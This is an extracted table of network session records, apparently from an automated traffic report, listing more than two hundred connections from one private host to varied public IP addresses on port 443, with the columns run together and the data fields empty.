                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13927192.168.2.233818090.37.222.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13928192.168.2.2342642159.217.245.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13929192.168.2.235362219.134.74.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13930192.168.2.235221278.255.1.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13931192.168.2.2360610149.108.127.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13932192.168.2.234823031.24.47.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13933192.168.2.2342322144.230.31.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13934192.168.2.2339872166.100.125.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13935192.168.2.2360694154.10.155.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13936192.168.2.235917064.132.246.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13937192.168.2.2347326111.11.197.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13938192.168.2.2342964177.252.106.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13939192.168.2.2348296212.16.252.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13940192.168.2.233538244.187.23.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13941192.168.2.233298427.5.15.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13942192.168.2.2335680115.8.99.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13943192.168.2.234236438.239.32.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13944192.168.2.234157034.168.135.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13945192.168.2.2360316142.41.28.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13946192.168.2.2333236165.84.195.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13947192.168.2.2351316200.242.212.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13948192.168.2.2337978126.196.22.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13949192.168.2.234164873.170.63.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13950192.168.2.234248446.183.197.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13951192.168.2.2341842163.116.20.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13952192.168.2.2343308210.30.231.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13953192.168.2.2346054114.139.104.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13954192.168.2.2340536191.193.231.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13955192.168.2.2355820137.172.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13956192.168.2.235136664.95.30.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13957192.168.2.2346076213.75.168.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13958192.168.2.233879657.7.69.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13959192.168.2.233669827.183.170.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13960192.168.2.2335710118.16.146.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13961192.168.2.235014470.143.148.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13962192.168.2.233816497.84.175.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13963192.168.2.2355304156.214.69.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13964192.168.2.234372637.34.121.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13965192.168.2.2350886180.36.197.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13966192.168.2.2340894197.133.205.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13967192.168.2.2336996141.138.225.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13968192.168.2.2336650109.205.226.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13969192.168.2.234341899.205.225.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13970192.168.2.2359336136.49.129.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13971192.168.2.2339410111.188.186.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13972192.168.2.2335566109.1.119.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13973192.168.2.2346804223.60.130.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13974192.168.2.234503212.148.29.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13975192.168.2.235040838.109.207.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13976192.168.2.234347081.230.243.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13977192.168.2.2352346157.151.82.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13978192.168.2.2356274211.194.58.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13979192.168.2.234500088.227.136.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13980192.168.2.23477508.243.96.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13981192.168.2.2359550149.255.127.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13982192.168.2.233351289.255.150.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13983192.168.2.2345932156.135.63.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13984192.168.2.235150257.46.161.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13985192.168.2.2354600182.141.236.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13986192.168.2.234365468.214.67.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13987192.168.2.2337390125.33.60.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13988192.168.2.2345236168.252.8.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13989192.168.2.2360132156.102.178.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13990192.168.2.234848264.250.138.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13991192.168.2.2349154111.98.236.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13992192.168.2.2356178187.126.14.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13993192.168.2.235907087.64.41.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13994192.168.2.234692482.42.216.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13995192.168.2.234916214.156.255.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13996192.168.2.2354906190.101.111.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13997192.168.2.2343110109.190.115.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13998192.168.2.2335928156.207.133.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13999192.168.2.234793838.33.91.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14000192.168.2.234611899.62.178.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14001192.168.2.2357178147.228.15.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14002192.168.2.235999219.97.206.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14003192.168.2.2335006110.212.119.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14004192.168.2.2334560209.77.81.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14005192.168.2.235539664.189.115.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14006192.168.2.23525909.191.240.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14007192.168.2.234489640.71.76.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14008192.168.2.2333102144.149.60.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14009192.168.2.235012020.130.83.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14010192.168.2.2360294209.29.3.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14011192.168.2.2358792126.47.32.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14012192.168.2.2334010135.95.0.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14013192.168.2.2347034187.153.134.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14014192.168.2.2345984179.185.117.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14015192.168.2.235974695.15.23.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14016192.168.2.2356630144.175.254.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14017192.168.2.2332876119.2.219.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14018192.168.2.2335830223.70.84.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14019192.168.2.2337636136.255.165.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14020192.168.2.234131865.248.18.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14021192.168.2.2358512112.62.2.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14022192.168.2.2346638155.241.135.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14023192.168.2.234111269.187.132.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14024192.168.2.2339278177.9.191.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14025192.168.2.2350870165.239.173.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14026192.168.2.2343668117.216.152.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14027192.168.2.2345438216.43.123.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14028192.168.2.235306289.254.193.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14029192.168.2.234399427.251.168.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14030192.168.2.2350538175.96.91.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14031192.168.2.234248639.174.245.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14032192.168.2.234022432.108.83.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14033192.168.2.2334856103.108.228.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14034192.168.2.2349638124.45.39.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14035192.168.2.2343138204.6.143.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14036192.168.2.2341218174.142.43.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14037192.168.2.2357138211.170.20.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14038192.168.2.2341454106.20.253.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14039192.168.2.2338728180.157.182.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14040192.168.2.2337230188.229.27.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14041192.168.2.234802053.147.228.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14042192.168.2.23531781.169.202.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14043192.168.2.2336272222.68.165.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14044192.168.2.2352408209.236.94.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14045192.168.2.2334910138.114.116.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14046192.168.2.23434589.83.35.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14047192.168.2.23554224.245.84.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14048192.168.2.233890289.92.112.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14049192.168.2.2337258183.35.75.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14050192.168.2.234994494.246.154.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14051192.168.2.2355880122.155.243.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14052192.168.2.2348480162.226.173.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14053192.168.2.23500385.250.183.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14054192.168.2.235017893.225.7.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14055192.168.2.2356440139.15.166.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14056192.168.2.2355712159.180.26.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14057192.168.2.236088645.45.50.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14058192.168.2.234572214.50.94.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14059192.168.2.235200665.210.206.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14060192.168.2.234813834.4.78.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14061192.168.2.2351026128.205.222.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14062192.168.2.234512047.197.254.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14063192.168.2.234890861.93.23.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14064192.168.2.2346170138.41.242.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14065192.168.2.234454074.54.136.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14066192.168.2.233542876.55.53.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14067192.168.2.233458857.44.96.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14068192.168.2.2344108149.65.234.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14069192.168.2.23339968.67.177.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14070192.168.2.2348294201.23.91.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14071192.168.2.233850651.251.93.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14072192.168.2.233926857.1.213.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14073192.168.2.2341114164.65.238.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14074192.168.2.2344708115.236.244.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14075192.168.2.2347266170.116.187.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14076192.168.2.235123277.162.195.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14077192.168.2.2337300132.168.11.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14078192.168.2.2337850220.131.157.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14079192.168.2.2332850136.0.24.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14080192.168.2.2356214102.214.233.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14081192.168.2.234393614.117.60.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14082192.168.2.233750451.251.87.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14083192.168.2.235363486.255.13.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14084192.168.2.2339980209.231.172.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14085192.168.2.234574619.160.238.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14086192.168.2.2358848153.73.232.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14087192.168.2.235904223.82.166.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14088192.168.2.233579013.42.231.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14089192.168.2.235918266.2.29.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14090192.168.2.2333448171.102.214.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14091192.168.2.234272031.164.53.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14092192.168.2.234052871.253.9.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14093192.168.2.233606881.95.81.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14094192.168.2.234744098.43.12.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14095192.168.2.2341674183.167.85.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14096192.168.2.2352142165.12.47.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14097192.168.2.2355110190.179.89.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14098192.168.2.2352512178.169.33.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14099192.168.2.2359852105.205.76.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14100192.168.2.2348950185.74.153.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14101192.168.2.2356068100.223.201.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14102192.168.2.2359170221.211.157.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14103192.168.2.235067885.240.106.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14104192.168.2.234473425.91.9.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14105192.168.2.233301658.24.169.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14106192.168.2.2338434159.181.1.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14107192.168.2.235158832.117.106.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14108192.168.2.233507052.106.142.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14109192.168.2.234008245.238.11.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14110192.168.2.2336104113.210.29.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14111192.168.2.234876470.69.193.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14112192.168.2.235212260.110.2.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14113192.168.2.2337440108.226.61.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14114192.168.2.2333734118.105.92.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14115192.168.2.235879658.206.7.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14116192.168.2.2340256141.90.223.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14117192.168.2.234349817.224.208.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14118192.168.2.2360940193.19.52.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14119192.168.2.2344986166.150.68.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14120192.168.2.2333226151.242.144.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14121192.168.2.234837468.98.13.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14122192.168.2.2360628114.80.151.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14123192.168.2.234062437.36.123.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14124192.168.2.234019887.60.161.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14125192.168.2.2354068114.144.84.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14126192.168.2.2339424164.222.226.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14127192.168.2.233778213.96.47.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14128192.168.2.2339372125.208.72.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14129192.168.2.2348488155.138.239.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14130192.168.2.2357670207.96.80.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14131192.168.2.2337876174.130.52.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14132192.168.2.2338504119.217.114.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14133192.168.2.233521882.248.34.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14134192.168.2.233562858.21.178.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14135192.168.2.2359778163.242.117.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14136192.168.2.234247069.28.162.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14137192.168.2.235154687.155.250.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14138192.168.2.2353018166.55.185.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14139192.168.2.2345858132.236.69.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14140192.168.2.234166431.103.214.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14141192.168.2.233538612.38.130.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14142192.168.2.2349228150.32.76.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14143192.168.2.2351250152.87.152.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14144192.168.2.2356460101.230.221.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14145192.168.2.235045297.124.80.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14146192.168.2.2332846212.207.7.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14147192.168.2.2341030191.126.14.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14148192.168.2.2346934112.168.209.174443
                                                TimestampBytes transferredDirectionData


